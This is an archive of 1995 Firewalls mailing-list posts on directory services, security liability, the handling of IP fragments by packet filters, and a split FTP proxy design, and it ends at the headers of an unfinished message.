Content-Length: 542
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Folks,

Slightly off-topic here, but I am not sure where to search...

Does anybody know of a publicly available directory-services software
that can be installed on Unix/Dos/Windows ? Something like a client and a
server where queries can be sent regarding E-mail address, phone #, etc.

I believe there's something called "ph" available - is it some sort of
directory-services stuff ?

Would be glad if somebody could throw some light on this. All suggestions
welcome!

Please respond to my address: acharya@wipsys.soft.net

Thanks,
-atul

From firewalls-owner Tue May 9 23:09:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA11443 for firewalls-outgoing; Tue, 9 May 1995 22:49:05 -0700
Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA11438 for ; Tue, 9 May 1995 22:49:02 -0700
Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s94eM-0000I6C; Tue, 9 May 95 22:49 PDT
Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA22952; Tue, 9 May 1995 22:49:36 +0800
Date: Tue, 9 May 1995 22:49:36 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505100549.AA22952@brittany.oes.amdahl.com>
To: alan@mid.net, firewalls@greatcircle.com
Subject: Re: Announce: Firewall SNMP mailing list
Content-Length: 1140
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Strangely enough, I just got this! For some reason it took 36 hours to
get to me. I've joined the list at mid.net, and hope that we can have
some fruitful discussions.

Patrick

>From firewalls-owner@GreatCircle.COM Tue May 9 19:03 PDT 1995
From: Alan Hannan
Subject: Announce: Firewall SNMP mailing list
To: firewalls@greatcircle.com
Date: Mon, 8 May 1995 09:04:58 -0500 (CDT)

Howdy.

I have created a majordomo (Thanks Brent!) mailing list for the
discussion of Firewall SNMP.

It is my hope that this list can provide a forum through which a
standardized SNMP MIB for firewalls can develop.

I look forward to your discussions.
subscribe:
	Send email to majordomo@mid.net with the text "subscribe fw-snmp"
	in the mailing list

to send mail to the list:
	Send the mail to "fw-snmp@mid.net"

--
alan@mid.net,                                   (402) 472-0241 (voice)
Networked Systems Administrator                 (402) 472-0240 (fax)
MIDnet, the United States Oldest Regional Internet Service Provider
" They that can give up essential liberty to obtain a little temporary
  safety deserve neither liberty nor safety. " - Benjamin Franklin

 _______________________________________________________________________
/ These opinions are mine, and not Amdahl's (except by coincidence;).   \
|                                                         (\            |
| Patrick J. Horgan      Amdahl Corporation                \\   Have    |
| patrick@amdahl.com     1250 East Arques Avenue            \\  _ Sword |
| Phone : (408)992-2779  P.O. Box 3470 M/S 316               \\/ Will   |
| FAX   : (408)773-0833  Sunnyvale, CA 94088-3470            _/\\ Travel|
\___________________________O16-2294________________________\)__________/

From firewalls-owner Wed May 10 02:39:16 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14437 for firewalls-outgoing; Wed, 10 May 1995 02:10:51 -0700
Received: from mailer.cefriel.it (ercole.cefriel.it [131.175.5.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14428 for ; Wed, 10 May 1995 02:10:29 -0700
Received: from punto.cefriel.it by mailer.cefriel.it (4.1/SMI-4.1) id AA21158; Tue, 9 May 95 13:16:23+010
Received: by punto.cefriel.it (4.1/SMI-4.1) id AA22953; Tue, 9 May 95 12:17:44+010
From: verga@mailer.cefriel.it (Alberto Verga)
Message-Id: <9505091117.AA22953@punto.cefriel.it>
Subject: SECURITY META HOTLIST
To: ids@uow.edu.au
Date: Tue, 9 May 1995 12:17:44 +0100 (GMT+0100)
Cc: Firewalls@GreatCircle.COM
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1311
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

I'm trying to collect as many links and pointers as possible to
_security related_ on-line documents, mailing lists, books, newsgroups
in order to make a SECURITY META HOTLIST, a sort of Pointers Library on
security.

I need information on:

	Security in general
	UNIX Security
	VIRUS
	Firewalls
	SNMPv2 Security
	Cryptography
	Security Architecture
	Electronic Commerce
	Commercial Vendors of SW and HW products on security

The _SECURITY META HOTLIST_ will be posted in _JUNE_ to the following
mailing lists:

	www-security@ns2.rutgers.edu
	e-payment@cc.bellcore.com
	Firewalls@GreatCircle.COM
	bugtraq@fc.net
	ids@uow.edu.au
	www-buyinfo@allegra.att.com

and the following newsgroups:

	sci.crypt
	alt.security
	unix.sys.adm

ANY kind of help will be appreciated.

Thank you in advance to all who are going to help me.

P.S. Sorry for duplicating information to people subscribed to more than
one of the above mailing lists.

--
----------------------------------------------------------------------
Alberto Verga                      e-mail : verga@mailer.cefriel.it
CEFRIEL - Politecnico di Milano
Via Emanueli, 15                   voice  : +39-2-66100083
20126 Milano (Italy)               fax    : +39-2-66100448
----------------------------------------------------------------------

From firewalls-owner Wed May 10 02:56:13 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA14746 for firewalls-outgoing; Wed, 10 May 1995 02:36:41 -0700
Received: from relay2.pipex.net (relay2.pipex.net [158.43.128.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA14741 for ; Wed, 10 May 1995 02:36:36 -0700
Received: from smtpgty.saicuk.co.uk by bath.pipex.net with SMTP (PP); Wed, 10 May 1995 10:36:52 +0100
Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <2FB094AA@smtpgty.saicuk.co.uk>; Wed, 10 May 95 10:25:46 GMT
From: "Johnson-Bryden, Ian"
To: "'Firewalls@GreatCircle.COM'"
Subject: RE: Liable for security
Date: Wed, 10 May 95 08:21:00 GMT
Message-ID: <2FB094AA@smtpgty.saicuk.co.uk>
Encoding: 115 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From: firewalls-owner
>To: Firewalls
>Subject: Liable for security
>Date: 09 May 1995 15:42
>
>We are analyzing the potential costs of a security breach.  One of the
>questions we are considering is the liability that may be incurred with
>various types of unauthorized behavior.
>
>What legal problems could a company incur if:
>   1. An employee posts offensive material?
>   2. A cracker hid a trojan horse in materials the company
>      distributes?
>   3. A cracker distributes copyrighted software from the company's
>      server?
>
>There are many different angles, but the basic question is whether or
>not there is a real risk of being held liable for damage done by illicit
>changes to the company's computer system.
>   Does anyone know of relevant cases?
>   Can anyone refer me to useful reference material?

The legal issues are largely pioneering and will vary from country to
country. It may also depend on the nature/size/reputation of the
corporations involved. Courts may consider relative levels of knowledge
and the burden of proof is usually greater in criminal than in civil
cases. Therefore a court may take the view that a company which has
already considered, or adopted, technology such as a firewall already
admits knowledge of all potential risks and has accepted responsibility
for preventing them. The result could then be that in two actions which
are functionally similar, the company which did not take any risk
management actions suffers less than the company which spent a fortune
on risk reduction technology that did not prevent the incident. I
believe that someone has already observed that 'the law is a ass'.

In a recent situation, Microsoft issued CD-ROMs to developers. Several
developers claimed that the material was contaminated by hostile code.
Microsoft appears to have admitted that the claims were correct, but
blamed a third party which produced the CD-ROM copies. From a public
statement I read, it seems that Microsoft just said that they would not
use the third party again.
There may have been a public statement or two which I did not see and
this/these may have contained further information. However, it looks like
Microsoft just brushed off this highly sensitive issue and no one took any
further action. If that is the case, it may be that the affected
developers (probably small companies) did not relish taking a large
corporation through the courts. Equally, some covert compensation may
have been paid on the condition that the recipient never talks about it
to anyone..

There is a growing number of BBS groups which discuss legal and
competence issues. These public discussions suggest that the incidence of
risks of this nature is quite widespread. Generally, the impression is
that most folk still prefer to avoid using the courts and this may be
wise because the legal systems in different countries are still
struggling to deal with post 'quill pen' technologies.

There is also the question of corporate sensitivity/business reputation.
Most corporations still seem to believe that even a successful court
action can result in collateral damage. The real winners of any court
action tend to be the lawyers. During the long (often very very long)
period from starting an action to final victory, the corporation bringing
the action has to commit valuable resources to support the action. In
civil actions there is always the danger that the plaintiff has to accept
a discounted sum hours before the trial and this may be less than 20% of
the total costs and damage. If the action does go to trial, the final
settlement is unlikely to recognise this considerable expense. Victory is
therefore rarely complete, however culpable the defendant.

There is also the matter of reputations. The corporation damaged by the
actions or inactions of another corporation may eventually win in court
but, during the period to the victory, the corporate reputation may be
severely damaged.

You only have to look back through some of the reactions on this list to
stories of organisations which have suffered some form of damage. Many
people will take the view that however negligent or criminal the
organisation found at fault, the victim is ridiculed by his peers for
allowing himself to be in the position. That's not unlike rape cases,
where the court verdict has little benefit to the reputation of the
victim. We all know that the victim asked to be hit unless that victim
happens to be us. If human nature was different there would be a lot of
news programmes and tabloid papers going out of business.

It is therefore not entirely surprising that victims are reluctant to
step forward and warn the rest of us of particular risks or take legal
action to recover damages or stop a repeat incident. As the law in most,
probably all, countries has not caught up with technology, the courts are
even more of a lottery than usual.

However, every corporation is open to legal attack in the areas detailed
by the questions above. That risk is in at least two categories.

Firstly, most civil and criminal legal systems would allow one party to
take action against another where it is claimed that negligence made
damage by a third party possible. How successful such an action would be
is open to question and will depend on the specific circumstances, the
national legal system being used, and probably heavily on the court
personalities involved in a specific case.

Secondly, any organisation may risk a legal attack which is never
intended to achieve a victory in court. I am aware (having been engaged
as an expert witness by one party) of incidents where the objective of
one party in a court action was to blackmail the other party into
agreeing to an 'out-of-court' settlement which was unusually favourable
and unlikely to be the result in continuing through trial.

In this situation, the largest corporation may win because it believes
that PR damage is not going to be a major factor to them and the other
smaller corporation cannot fund an effective legal defence/attack.
Sometimes a small corporation may win this way because it has little
reputation to hazard but the other party could suffer considerable damage
to reputation. An additional factor may be that the senior officers of
some corporations consider it 'macho' to have a long list of legal
actions against them pending.

Ian J-B

From firewalls-owner Wed May 10 05:39:24 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16360 for firewalls-outgoing; Wed, 10 May 1995 05:25:48 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16355 for ; Wed, 10 May 1995 05:25:43 -0700
Message-Id: <199505101225.FAA16355@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA258588870; Wed, 10 May 1995 22:27:50 +1000
From: Darren Reed
Subject: Re: IP Packet Filtering
To: danny@BouletFermat.ab.ca (Danny Boulet)
Date: Wed, 10 May 1995 22:27:50 +1000 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199505091701.LAA02644@nahanni.BouletFermat.ab.ca> from "Danny Boulet" at May 9, 95 11:01:01 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1131
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Danny Boulet, they said:
[...]
> I will concede that, in theory, this implementation is broken (i.e. it could
> reject a packet that shouldn't be rejected).  I contend that, in practice,
> the implementation is correct since packets aren't fragmented into pieces
> that
> are so small that the TCP flags appear in the second fragment.
> If someone
> sends you fragments that are so short that the TCP flags don't make it into
> the first fragment then either the sender is trying to do something weird
> or it is going to take an absurd number of fragments to get any reasonable
> amount of data through to you.

In practice, I've done it.

If I can do it, then crackers can do it. And have probably been doing
it for longer than I have. Crackers *ARE* going to try and do weird
things. It is the job of the firewall software to deal with and
neutralise this threat.

Depending on how your firewall package behaves, I may have to fragment
many packets or just a few.

And I may not need to send a lot either. How many packets did "mitnick"
need to send in order to get his IP spoofing attack to work ?

darren

From firewalls-owner Wed May 10 05:57:27 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA16297 for firewalls-outgoing; Wed, 10 May 1995 05:10:20 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA16292 for ; Wed, 10 May 1995 05:10:16 -0700
Message-Id: <199505101210.FAA16292@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA253377868; Wed, 10 May 1995 22:11:08 +1000
From: Darren Reed
Subject: Re: Linux as multi-homed firewall... (fwd)
To: marekm@i17linuxb.ists.pwr.wroc.pl (Marek Michalkiewicz)
Date: Wed, 10 May 1995 22:11:08 +1000 (EST)
Cc: firewalls@greatcircle.com
Reply-To: avalon@coombs.anu.edu.au
In-Reply-To: <199505092000.WAA18835@i17linuxb.ists.pwr.wroc.pl> from "Marek Michalkiewicz" at May 9, 95 10:00:46 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1273
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Marek Michalkiewicz, they said:
>
> > I posted this mail elsewhere, and I'm doing it again here for user
> > education.  Sorry to those who see it twice.  Maybe I should/could post
> > it to bugtraq (even instead of), but the point I'm trying to make is
> > one centred on bugs, but on choice of software for firewalls and the
> > quality thereof.  Someone who uses linux might want to file a bug
> > report if they think it's serious enough.
>
> This bug is fixed now, see ftp://ftp.linux.org.uk/pub/tmp/ipsizefix-1.2.8
> for a patch.
>
> No OS is completely bug free, and we all know that.
>
> It is easy to just complain that "Linux is buggy" but, unfortunately,
> this doesn't make it any less buggy...  Instead, please report bugs
> in Linux to the appropriate mailing lists:
[...]

Like I said, I don't care for Linux nor do I use it. But I do care about
those who run/setup firewalls and who need to know about such "bugs".

My concern isn't that Linux is "buggy", but that it is "buggy" in an area
where it can't afford to be buggy if used in an environment such as that
a firewall is in. When you find a bug in less than 30 seconds of looking
at the source for the first time, you can't help but wonder why nobody
else has.

cheers,
Darren

From firewalls-owner Wed May 10 06:09:32 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16801 for firewalls-outgoing; Wed, 10 May 1995 06:05:53 -0700
Received: from taureau.as03.bull.oz.au (taureau.as03.bull.oz.au [134.211.128.112]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16789 for ; Wed, 10 May 1995 06:05:44 -0700
Received: by taureau.as03.bull.oz.au id AA28370 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 10 May 1995 23:05:52 +1000
Received: from localhost (localhost [127.0.0.1]) by zen.void.oz.au (8.6.10/8.6.9) with SMTP id WAA28299; Wed, 10 May 1995 22:45:00 +1000
Message-Id: <199505101245.WAA28299@zen.void.oz.au>
X-Authentication-Warning: zen.void.oz.au: Host localhost didn't use HELO protocol
To: cwerner@hsdemo.merit.edu (Christopher L. Werner)
Cc: firewalls@greatcircle.com
Subject: Re: ftp through 2 dual-homed bastions
In-Reply-To: Your message of "Mon, 08 May 95 23:48:19 EST." <199505090342.XAA14939@hostserver.merit.edu>
Date: Wed, 10 May 1995 22:44:59 +1000
From: "Simon J. Gerraty"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> About a month ago ftp through a firewall was discussed. Things seemed to
> gravitate toward ftp clients which supported PASV including some of the web
> browsers.
>
> Telnet and http can be accomplished with plug-gw but how do I do ftp. Would
> tcp-wrapper help?

Nope. You want a split ftp-proxy as described in C&B. And since I've just
shot my mouth off in the fwtk list I might as well do it here too :-)

And yes I hope to have unfs packaged up this weekend...

[repeated message below...]

The real answer is a split ftp proxy as described in C&B. I have modified
the TIS ftp-gw to do just this plus added an external bindport facility
(also described in C&B) so that the ftp proxies can run non-root and
still use reserved ports - lets you use more restrictive acl's on the
choke router.

I'm busy packaging up my unfs too, but I'll shar up ftp-gw2 this weekend.
The README file is below for those in the same boat.

--sjg

FTP-GW2

This is the TIS ftp-gw hacked by Simon J. Gerraty to support a twin
bastion firewall (with a choke router between the two bastions).

How it works:

  [client]---C--->[ftp-igw]----C--->[ftp-ogw]----C--->[server]
      ^---D----                ----D----^  ^----D----

  C  Control session
  D  Transient Data session

ftp-igw is started by inetd on the internal bastion in response to a call
from "client". ftp-igw does pre-authentication of "client". What I mean
here is that it checks that "client" is allowed to use the proxy. It
cannot at this stage check if "client" is allowed to ftp to "server",
that check is made by ftp-ogw. Actually ftp-ogw checks only that "server"
is an allowed destination.
Splitting the authentication this way allows the proxies to be simpler
and avoids the need for ftp-igw to be able to resolve "server" and for
ftp-ogw to be able to resolve "client". The downside is that you cannot
specify that some systems can call "server" but others cannot. If this
seems a major limitation I can address it, but I think the above should
be adequate and can be implemented much more easily. Note that I've
modified the log entries so that the logs from ftp-igw can be matched
with those from ftp-ogw thus allowing matching of client and server.

To do the complete check would require something like, passing client's
IP address though to ftp-ogw, or allowing DNS traffic through choke. A
common reason for needing a split firewall like this is to hide a bunch
of illegal nets on the inside. In such cases DNS traffic cannot be
allowed through the firewall at all. I've avoided any reliance on being
able to resolve outside on the inside etc.

If "client" is ok, ftp-igw calls ftp-ogw on the FTP_GW port and passes
any user@dest [port] etc if given on the command line, or simply enters
its main loop and lets "client" issue a "user" command etc.

Once ftp-ogw has the "user@dest" it checks that "dest" is ok, and
attempts a connection. Most of what happens then is exactly as for the
original TIS ftp-gw with ftp-ogw doing 99% of the work. The only commands
that ftp-igw handles relate to PORT commands, all others are passed
through to ftp-ogw.

PORT commands are handled thus:

ftp-igw does the usual checks and then records the client's port number.
It then sends a dummy PORT command to ftp-ogw. ftp-ogw binds a port and
sends its own PORT command to the remote ftpd. When it receives the
callback, it binds another (reserved if possible) port and sends a PORT
command back to ftp-igw. ftp-igw gets the PORT command from ftp-ogw,
calls it, and then calls back to "client" using a reserved port if
possible.

Note that we established all connections as outgoing calls through the
choke router.

From firewalls-owner Wed May 10 06:39:36 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17221 for firewalls-outgoing; Wed, 10 May 1995 06:30:06 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17208 for ; Wed, 10 May 1995 06:30:01 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA21179; Wed, 10 May 95 09:15:12 -0400
Date: Wed, 10 May 95 09:15:12 -0400
Message-Id: <9505101315.AA21179@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Liable for Security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ian rites:

>Therefore a court may take the view that a company which has already
>considered, or adopted, technology such as a firewall already admits
>knowledge of all potential risks and has accepted responsibility for
>preventing them. The result could then be that in two actions which are
>functionally similar, the company which did not take any risk management
>actions suffers less than the company which spent a fortune on risk
>reduction technology that did not prevent the incident.

Still not allowed to have an opinion but would seem that if the sewer
could show that the sooie (or some responsible individual) did know of
the risks (and subscription to the FIREWALLs list might be an indication)
then the effect would be reversed. "Shoulda knowed" is the "culpable"
part.

Does sound like high comedy though. Can see the solicitor advising a
client: "Now here we need to prove that you, the CIO of a successful
multi-billion dollar company, are an idiot."

Warmly,
Padgett

From firewalls-owner Wed May 10 07:09:19 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17975 for firewalls-outgoing; Wed, 10 May 1995 06:56:18 -0700
Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17970 for ; Wed, 10 May 1995 06:56:15 -0700
Posted-Date: Wed, 10 May 1995 09:56:49 -0400
From: "Bryan D. Boyle"
Message-Id: <9505100956.ZM10510@maverick.erenj.com>
Date: Wed, 10 May 1995 09:56:49 -0400
In-Reply-To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) "Liable for Security" (May 10, 9:15am)
References: <9505101315.AA21179@uvs1.orl.mmc.com>
X-Phone: (908) 730-3338
X-Saying: Strange problems call for strange solutions.
X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s
X-Mailer: Z-Mail (3.2.0 06sep94)
To: firewalls@greatcircle.com
Subject: Re: Liable for Security
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On May 10, 9:15am, A. Padgett Peterson, P.E. Information Security wrote:
> Does sound like high comedy though. Can see the solicitor advising a client:
> "Now here we need to prove that you, the CIO of a successful multi-billion
> dollar company, are an idiot."

Or, perhaps not high comedy. ;) Depends on the company, and who is the
CIO, eh? I would posit that the CIO of a company at some level of
"largeness" would be relatively clueless about the *precise* risks,
exposures, etc. of his/her/its organization. You probably don't get to be
CIO by being on a tech weenie career path, or internal audit teams, which
is where the understanding of this usually resides.

--
Bryan D. Boyle            |The Moving Finger writes,and having writ, moves on.
#include |Nor all your Piety nor Wit can call it back to cancel EMAIL: bdboyle@erenj.com |Half a line, or all your tears wash out a Word of it. -------------------- From firewalls-owner Wed May 10 07:24:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17920 for firewalls-outgoing; Wed, 10 May 1995 06:54:38 -0700 Received: from virtual.office.com (welcome.vo.com [204.192.49.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17910 for ; Wed, 10 May 1995 06:54:34 -0700 Received: (from alex@localhost) by virtual.office.com (8.6.12/8.6.12) id JAA01748; Wed, 10 May 1995 09:56:12 -0400 Date: Wed, 10 May 1995 09:56:12 -29900 From: "S. Alexander Jacobson" Subject: Re: Liable for security To: Todd Vander Does cc: Firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There are many different angles, but the basic question is whether or > not there is a real risk of being held liable for damage done by elicit > changes to the company's computer system. > Does anyone know of relevant cases? > Can anyone refer me to useful reference material? I forwarded your post to Henry Dinger a lawyer at Goodwin, Proctor and Hoar in Boston. He represents companies like ziff and at&t in their online business. Mail him directly for more information. Here is his short reply to your query. ----- From hdinger@gph.com Wed May 10 09:50:46 1995 Date: Wed, 10 May 95 07:03:32 From: hdinger@gph.com To: "S. Alexander Jacobson" Subject: Re: Liable for security (fwd) Alex-- [irrelevant stuff deleted] The question is an interesting one. I doubt there are many cases considering the issue. The company may be liable for an employee's posting of "offensive material" just as it may be liable for an employee's negligent driving of a company car on company business. It depends on whether the employee was acting as a company employee. 
The company's responsibility for the effects of a cracker's mischief is more complicated. If it distributed virus-infected software, it may have breach of warranty liability to its customers even though it may not have been negligent in failing to catch the infection. The distribution of copyrighted material presents an issue similar in some respects to the *Playboy v. Frena* case, where a BBS sysop was found liable for copyright infringement where a subscriber posted copyrighted images, even though the sysop claimed not to know the uploads were copyrighted. The result might be different if the company did not invite others to upload materials. --Henry From firewalls-owner Wed May 10 07:40:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA18716 for firewalls-outgoing; Wed, 10 May 1995 07:33:41 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA18708 for ; Wed, 10 May 1995 07:33:36 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id IAA05652; Wed, 10 May 1995 08:33:20 -0600 Date: Wed, 10 May 1995 08:33:20 -0600 From: Danny Boulet Message-Id: <199505101433.IAA05652@nahanni.BouletFermat.ab.ca> To: avalon@coombs.anu.edu.au, danny@nahanni.bouletfermat.ab.ca Subject: Re: IP Packet Filtering Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed says: > In some mail from Danny Boulet, they said: > [...] > > I will concede that, in theory, this implementation is broken (i.e. it could > > reject a packet that shouldn't be rejected). I contend that, in practice, > > the implementation is correct since packets aren't fragmented into pieces > > that > > are so small that the TCP flags appear in the second fragment. 
> > If someone sends you fragments that are so short that the TCP flags don't make it into
> > the first fragment then either the sender is trying to do something weird
> > or it is going to take an absurd number of fragments to get any reasonable
> > amount of data through to you.
>
> In practice, I've done it.
>
> If I can do it, then crackers can do it. And have probably been doing
> it for longer than I have. Crackers *ARE* going to try and do weird
> things. It is the job of the firewall software to deal with and
> neutralise this threat.
>
> Depending on how your firewall package behaves, I may have to fragment
> many packets or just a few.
>
> And I may not need to send a lot either. How many packets did "mitnick"
> need to send in order to get his IP spoofing attack to work ?
>
> darren
>

Just to be clear, v2.0 of my ipfirewall package deals with this threat by rejecting the first fragment of a fragmented packet if the fragment is too small to determine whether or not a filter should match. This effectively rejects the entire packet since the destination host won't be able to reassemble the packet. It does this because I believe that it is better to err on the side of paranoia when it comes to playing the Internet security game.

One point that I missed in my first posting is that ipfirewall doesn't attempt to match a filter to tail fragments (I define a tail fragment as a fragment other than the first) if the filter is checking either port numbers or the TCP connection flags. This could result in these tail fragments getting through when they shouldn't. On the other hand, the head fragment will be checked. If it gets rejected by the firewall host then the tail fragments will eventually be discarded by the destination host. Note that it is possible in this scenario to launch a denial of service attack on the destination host by flooding it with tail fragments.
My user's guide suggests that you either block all fragments if you are worried about this denial of service attack or that you allow in all tail fragments if you aren't and let the normal head fragment checking determine which of these tail fragments can ever be reassembled into complete packets.

From firewalls-owner Wed May 10 08:15:39 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA18916 for firewalls-outgoing; Wed, 10 May 1995 07:39:40 -0700
Received: from math.ams.org (MATH.AMS.ORG [130.44.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA18910 for ; Wed, 10 May 1995 07:39:36 -0700
Received: from sol08.ams.org by MATH.AMS.ORG (PMDF #7286 ) id <01HQC2P3997K95N3GX@MATH.AMS.ORG>; Wed, 10 May 1995 10:39:44 EST
Received: by sol08.ams.org (4.1/SMI-4.1) id AA16971; Wed, 10 May 95 10:39:35 EDT
Date: 10 May 1995 10:39:34 -0300 (BST)
From: Todd Vander Does
Subject: Re: Liable for security
In-reply-to: Your message of Wed, 10 May 1995 09:56:12 -29900
To: "S. Alexander Jacobson"
Cc: Todd Vander Does , Firewalls@GreatCircle.COM
Message-id:
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks, this is a solid beginning. I appreciate your efforts and will let you know if I produce anything useful.
Todd

From firewalls-owner Wed May 10 08:40:08 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19202 for firewalls-outgoing; Wed, 10 May 1995 07:46:38 -0700
Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19197 for ; Wed, 10 May 1995 07:46:30 -0700
Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id IAA05681; Wed, 10 May 1995 08:46:16 -0600
Date: Wed, 10 May 1995 08:46:16 -0600
From: Danny Boulet
Message-Id: <199505101446.IAA05681@nahanni.BouletFermat.ab.ca>
To: amolitor@anubis.network.com, firewalls-digest@greatcircle.com
Subject: Re: IP packet filtering...
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Andrew Molitor says:
>
> What I've done for the packet filtering work I am doing is this:
>
> Any pattern which requires data not present in the datagram
> in hand does not match. Thus, if the TCP flags are not in the first
> datagram, a filter of the form:
>
> .. stuff ..
> tcp_connect_request ;
> .. stuff ..
>
> will not do to the first fragment, since it is logically
> NOT a tcp_connect_request. The flags will show up in, say, the 2nd frag,
> whereupon if the SYN is set and the ACK is not, the actions will be
> taken with respect to that packet.
>
> This seemed to me to be the easiest solution, it's relatively easy to
> use an abstraction that understands the idea of 'Nth byte after the beginning
> of the transport layer header' and to teach that abstraction about fragments
> is a no-brainer, so we handle flags by simply asking for the 13th byte, and
> if it's not there, the answer to all questions about that byte ('is it
> between 0 and 255?' 'is the 3rd bit set?') is 'no'.
>
> I think this does make the semantics a little complicated, but not
> any more complicated than anything else -- the fact is that IP fragments
> and you have to deal with that if you don't want to do reassembly just
> to filter.
>
> Andrew
>

I may be missing something but this doesn't seem to work. What do you do if the filter requires data that is spread between two different fragments? For example, let's assume that you have a filter that is supposed to reject any packets that are being sent to a particular TCP/IP port and which are TCP connection requests. The vandal fragments his TCP/IP packets so that the TCP port numbers always appear in one fragment and the TCP flags needed to do the connection request checking appear in another. Are you saying that your scheme would not apply the filter to either fragment (since neither fragment contains all of the data required to do the match)? If so then your scheme would seem to allow such fragments through (i.e. a vandal could defeat you by sending carefully crafted fragments).

From firewalls-owner Wed May 10 09:29:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19985 for firewalls-outgoing; Wed, 10 May 1995 08:19:12 -0700
Received: from eden.eecs.nwu.edu (eden.eecs.nwu.edu [129.105.5.60]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19980 for ; Wed, 10 May 1995 08:19:06 -0700
Received: by eden (8.6.11/8.6.11) id BAA02833; Wed, 10 May 1995 01:02:11 -0500
Date: Wed, 10 May 1995 01:02:11 -0500
From: Robert Bonomi
Message-Id: <199505100602.BAA02833@eden>
